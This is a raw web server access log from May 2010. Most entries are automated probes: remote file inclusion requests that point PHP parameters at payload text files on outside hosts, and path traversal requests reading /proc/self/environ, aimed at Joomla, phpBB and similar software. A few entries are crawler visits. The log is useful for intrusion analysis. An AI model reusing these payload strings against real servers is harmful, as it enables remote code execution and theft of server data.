202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/access_log.1272326400/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:24:48 -0500] "GET /logs/access_log.1262649600/MOD_forum_fields_parse.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.46.13.50 - - [23/May/2010:04:27:03 -0500] "GET /logs/access_log.1243987200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.50 - - [23/May/2010:04:27:03 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.239.161.143 - - [23/May/2010:04:27:51 -0500] "GET /logs/access_log.1273017600%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:04:27:51 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:04:27:51 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
212.241.251.224 - - [23/May/2010:04:29:43 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
207.45.185.154 - - [23/May/2010:04:29:58 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
207.44.228.84 - - [23/May/2010:04:31:49 -0500] "GET /logs/access_log.1271289600/playing.php/common/db.php?commonpath=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
207.44.228.84 - - [23/May/2010:04:31:49 -0500] "GET /playing.php/common/db.php?commonpath=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
207.44.228.84 - - [23/May/2010:04:31:50 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.191.94.188 - - [23/May/2010:04:32:38 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:32:38 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:32:38 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:32:38 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:04:32:45 -0500] "GET /logs/access_log.1272499200/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:04:32:49 -0500] "GET /logs/access_log.1272585600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:34:01 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.832"
207.45.185.154 - - [23/May/2010:04:34:12 -0500] "GET /logs/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:04:34:12 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
88.191.94.188 - - [23/May/2010:04:34:17 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:34:17 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:34:17 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:34:24 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.195.112.180 - - [23/May/2010:04:35:32 -0500] "GET /logs/access_log.1231718400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.240 - - [23/May/2010:04:35:33 -0500] "GET /logs/access_log.1160179200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.190.102.21 - - [23/May/2010:04:36:15 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:04:36:15 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:04:36:15 -0500] "GET /logs/access_log.1271548800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [23/May/2010:04:38:33 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.45.185.154 - - [23/May/2010:04:44:48 -0500] "GET /logs/access_log.1212451200/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:04:44:48 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:04:44:48 -0500] "GET /logs/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.833"
88.191.94.188 - - [23/May/2010:04:44:59 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:44:59 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:44:59 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:45:00 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:45:00 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:45:00 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:04:47:11 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:04:47:12 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:04:47:12 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
121.88.4.141 - - [23/May/2010:04:47:46 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:47:46 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:47:46 -0500] "GET //admin/auth.php?xcart_dir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.251.224 - - [23/May/2010:04:47:53 -0500] "GET /logs/access_log.1212451200/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:04:47:53 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:04:47:53 -0500] "GET /logs/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.805"
121.88.4.141 - - [23/May/2010:04:48:16 -0500] "GET /logs/access_log.1262563200//admin/auth.php?xcart_dir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:04:48:21 -0500] "GET /logs/access_log.1264032000//admin/auth.php?xcart_dir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:22 -0500] "GET /logs/access_log.1264636800/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:22 -0500] "GET /includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:22 -0500] "GET /logs/access_log.1264204800/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:22 -0500] "GET /logs/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:30 -0500] "GET /logs/access_log.1264204800/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:30 -0500] "GET /logs/access_log.1264636800/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:31 -0500] "GET /includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:48:31 -0500] "GET /logs/includes/functions_nomoketos_rules.php?phpbb_root_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:04:48:31 -0500] "GET /logs/access_log.1232668800%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:53:01 -0500] "GET /logs/access_log.1212451200/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:04:53:02 -0500] "GET /?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:04:53:02 -0500] "GET /logs/?option=com_joomlaxplorer&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.832"
207.46.13.140 - - [23/May/2010:04:55:32 -0500] "GET /logs/access_log.1175904000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.115.111.115 - - [23/May/2010:04:56:25 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:04:56:25 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:04:56:25 -0500] "GET /logs/access_log.1271030400//bemarket/postscript/postscript.php?p_mode=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:04:56:36 -0500] "GET /logs/access_log.1271808000//bemarket/postscript/postscript.php?p_mode=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
202.6.141.218 - - [23/May/2010:04:56:57 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:04:56:57 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:04:56:58 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
72.167.140.113 - - [23/May/2010:05:00:24 -0500] "GET //errors.php?error=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.834"
72.167.140.113 - - [23/May/2010:05:00:24 -0500] "GET /logs//errors.php?error=http://klip.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.834"
121.190.102.21 - - [23/May/2010:05:00:58 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:00:58 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:00:58 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:00:58 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:02:09 -0500] "GET /logs/access_log.1262649600/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:02:10 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:02:10 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:02:10 -0500] "GET /logs/access_log.1271635200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.199.180 - - [23/May/2010:05:10:02 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
174.37.199.180 - - [23/May/2010:05:10:02 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.37.199.180 - - [23/May/2010:05:10:02 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.51.110 - - [23/May/2010:05:10:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [23/May/2010:05:10:32 -0500] "GET /logs/access_log.1207872000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
65.55.51.110 - - [23/May/2010:05:11:08 -0500] "GET /logs/access_log.1212710400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.240.36.36 - - [23/May/2010:05:11:36 -0500] "GET //includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:05:11:36 -0500] "GET /logs/access_log.1264982400//includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
219.240.36.36 - - [23/May/2010:05:11:36 -0500] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:05:11:40 -0500] "GET /logs/access_log.1273363200%20%20//png.php?include_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.55.146.200 - - [23/May/2010:05:14:52 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [23/May/2010:05:14:53 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
58.180.42.218 - - [23/May/2010:05:14:56 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:14:56 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:14:56 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:14:56 -0500] "GET /logs/access_log.1262822400//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:15:18 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:15:18 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:15:18 -0500] "GET /logs/access_log.1262822400//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.46.199.191 - - [23/May/2010:05:15:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.254.228.146 - - [23/May/2010:05:15:38 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:15:49 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [23/May/2010:05:15:49 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [23/May/2010:05:16:10 -0500] "GET /logs/access_log.1223683200%20%20//png.php?include_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:17:32 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:17:32 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.167.65.30 - - [23/May/2010:05:17:32 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_joomlalib&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://base.sistemajuvenil.org/base/id.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:19:12 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:19:12 -0500] "GET /logs/access_log.1262822400//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:19:12 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.254.228.146 - - [23/May/2010:05:19:12 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:05:22:19 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
